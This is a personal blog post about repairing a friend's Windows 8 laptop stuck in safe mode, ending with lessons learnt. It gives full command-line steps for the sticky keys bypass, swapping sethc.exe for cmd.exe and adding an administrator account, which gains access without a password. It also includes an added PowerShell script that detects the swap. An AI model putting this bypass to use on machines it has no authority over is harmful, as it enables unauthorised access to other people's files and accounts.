Repairs on the side, Windows 8, Forgotten Passwords and the Sticky Key Exploit
The Issue
User shoots me an email, personal laptop playing up after the latest Windows update mishap. Just a few hours ago, I'd explained to someone over the phone how to boot to the recovery command prompt, uninstall the latest updates and give the disk a bit of a telling to.
Sure, no problem. Leave it with me, charger and password. I’ll give you a shout when done.
It’s Friday. I’m thinking beer money.
Boot the laptop, enter the given PIN. This should have been the first alarm bell. PIN. Continue to boot to desktop. All ok. Bah! It's fine. "Fixed itself" – no beer money. Wait, wait… screen starts to flash randomly. Once. Twice. Faulty laptop, something to repair.
Quickie email to user, you said a, it’s doing b, come take a look. Ah! New problem. Assume update issue (I haven’t a clue right now, I’m thinking Intel driver…). Ok, I have to shoot, pick it up Tuesday? Sure see you then.
Friday beer money gone, mid-week lunch with Mrs (works down the road) on the horizon.
It’s 5:30. I’m finishing up work / burning an 8 install disk. Reboot the laptop – still flashing. Can’t do anything unless it’s between the 2/3 second flashes.
Default first fix rule, profile or OS? – Safe mode.
The Problem
Hmm Windows 8 safe mode, this is new. Can’t use advanced Windows features, screen pretty much locked. Shift and F8 not playing ball. Manage to get MSCONFIG up after a couple of well-timed clicks. Set the flag.
Reboot to safe mode. Asks for password. I have pin. Text user. No clue. No password. I’m stuck in safe mode.
I’ve now got a laptop that’s stuck in safe mode. No Administrative account or password. Great.
Hiren's it is. K0nb00t. No joy. Password changer no joy. Can't manually load registry. Of course not, this is Mr Protected Windows 8. So I grab a copy of the "new" K0nb00t off a friend. No joy.
Now worried. I can’t hack it the normal way.
So I’m thinking: Need to disable safeboot flag via command line. Recovery console.
I head over to 8 forums. Find the "Windows 8 Safe Mode" post. Exactly what I needed, as usual. Start mashing commands.
Windows says: Your commands are no good here. Googlemashing does not make you an IT engineer. Give up. Go home. I refuse to accept defeat. I know what I’m doing. Continue commands. bcdedit /enum, shoots errors. Of course it does, I’m running from CD not the inbuilt recovery partition. No switching allowed. Mash the commands anyway. Nope. Nothing.
Ok, so plan B. Create a user, elevate it, use that to login, reset user password, clear flag. Fix laptop. Earn lunch. Easy.
No.
This command prompt is not elevated and does not allow such things. This is also a Microsoft Online account, no local manipulation allowed. Humph. Google mashing commences. I stumble on this. "Forgotten password K0nb00t". Last post … "Without requiring any 3rd party program". Interesting.
The Fix
This is where it gets fun.
I know I need to get myself a local admin account sorted. So I can properly administer this machine. I know I can console this in, with the right console. Along comes the sticky key exploit. I’ll list my steps to gain Administrative access to Windows 8, without once entering a password.
Boot to your recovery CD
Open up a command prompt
copy c:\windows\system32\sethc.exe c:\ (assuming C is the OS)
copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
shutdown.exe -r (or back out of the menu to a reboot)
As soon as the login screen appears, mash the shift key, five times
A console should open
net user LWBM P455w0rd123 /add
net localgroup administrators LWBM /add (it did shoot an error, not one that concerned me)
shutdown.exe -r -t 5
The laptop rebooted, showed me the same user login screen, to which I don't have access, but there's the wondrous arrow: switch user. There I am. LWBM. Logging in. No problems.
Here I am logged in, as an Administrator, able to browse the other user’s files, desktop, OneDrive. Awesome.
I can now clear the safe mode flag, using safe mode’s GUI.
By this point I've completely forgotten I'm stuck in safe mode and just focused on gaining access. Hence no commands on my new-found shift console.
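The swap in the steps above is also easy to spot after the fact. The following is an added example, not from the original post: a PowerShell check that compares the installed sethc.exe with cmd.exe. It assumes a default install with Windows under `$env:SystemRoot` on the system drive, and an elevated PowerShell prompt on the machine being checked.

```powershell
# Added example, not from the original post. Detects the sethc.exe-for-cmd.exe
# swap described above. Assumes a default install (Windows under $env:SystemRoot,
# system drive in $env:SystemDrive) and an elevated prompt. Uses .NET for hashing
# so it also runs on the PowerShell 3.0 that ships with Windows 8.
function Get-Sha256Hex([string]$Path) {
    $sha = [System.Security.Cryptography.SHA256]::Create()
    try {
        ($sha.ComputeHash([IO.File]::ReadAllBytes($Path)) |
            ForEach-Object { $_.ToString('x2') }) -join ''
    } finally { $sha.Dispose() }
}

function Test-StickyKeysSwap {
    $system32 = Join-Path $env:SystemRoot 'System32'
    $sethc    = Join-Path $system32 'sethc.exe'
    $cmd      = Join-Path $system32 'cmd.exe'
    $findings = @()

    # Check 1: a straight "copy /y cmd.exe sethc.exe" leaves the two files byte-identical.
    if ((Get-Sha256Hex $sethc) -eq (Get-Sha256Hex $cmd)) {
        $findings += 'sethc.exe has the same SHA256 as cmd.exe (file replaced)'
    }

    # Check 2: the PE version resource still names the original file, so a renamed
    # cmd.exe reports "Cmd.Exe". A signature check alone would not catch this: the
    # copy is still a validly catalog-signed Microsoft binary, just under the wrong name.
    $origName = (Get-Item $sethc).VersionInfo.OriginalFilename
    if ($origName -and $origName -notlike 'sethc*') {
        $findings += "sethc.exe reports OriginalFilename '$origName'"
    }

    # Check 3: step 3 of the procedure parks a backup of the real sethc.exe at the
    # root of the system drive; its presence is a tell in itself.
    $leftover = Join-Path $env:SystemDrive 'sethc.exe'
    if (Test-Path $leftover) {
        $findings += "backup copy of sethc.exe found at $leftover"
    }

    # An empty array means nothing suspicious was seen.
    return ,$findings
}

$result = Test-StickyKeysSwap
if ($result.Count -eq 0) {
    'sethc.exe looks untouched'
} else {
    $result | ForEach-Object { Write-Warning $_ }
    # Remediation: sfc /scanfile=<path to sethc.exe> restores the protected copy
    # from the component store.
}
```

The checks only cover the binary swap this post uses; the underlying point is that anyone with a boot disk can edit an unencrypted system volume, which is what full-disk encryption (BitLocker) is there to stop.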
The Actual Fix
Now I've gained access I can look at the flashing screen. I continue to do my look around trying to work out why. Safe mode is fine. User accounts, not so. OS issue. Hardware also fine (forgot to mention the base, case & keys have the remnants of baby cream all over the place). A driver update did nothing (I was thinking a Windows update to the Intel driver may have gone awry). So I did a system restore, rolled back to before the last updates. Sorted. No more flashing. Checked for more / re-ran the new patched updates. All good. Quick wipe down. Awaiting collection.
Lessons Learnt
Stop Grabbing at Quick Money
- This goes with "have you got a second" and "just a quick look"
- It's never, ever a second, nor a quick look. Ever.
As much as I love Windows 8, it’s a challenge, it’s new.
Laptops now have both Online and Local accounts. You need a Local Admin account. Always. The Windows 8 setup does not push a user into setting one up, so expect one not to have been created.
The sticky keys exploit – been around forever – new to me!
As ever. Backup. Backup. Backup.
- I was doing things to a Windows 8 laptop I didn’t fully understand. I got the gist (as is the norm with me) but wasn’t 110% sure what I was doing, even though I started off fine. As soon as you can, backup. Things can go wrong so quickly, even when you’re following standard procedure. (I didn’t have to call on said backup, but the reassurance sitting next to me on a USB was comforting and de-stressing).
I'll continue to fix users' personal laptops. I get berated by friends and colleagues for it. It's dangerous. It's risky. You could totally mess it up, accidentally break it, find something worse that you can't fix but is somehow now your fault, get it stolen in transit, change it in a way the owner doesn't like, even if the toolbar was installed under SuperHappyFunTimeSearchAssistantHelperPro.
Lay down the rules to your customer. Paying or not. Define exactly what the issues are and what steps you’re going to take. Backup. If you can’t pinpoint the job at the start and intend on Googlemashing from the outset, don’t take the job on.
I learn so much more with users’ computers. They break differently than the ones I build at work.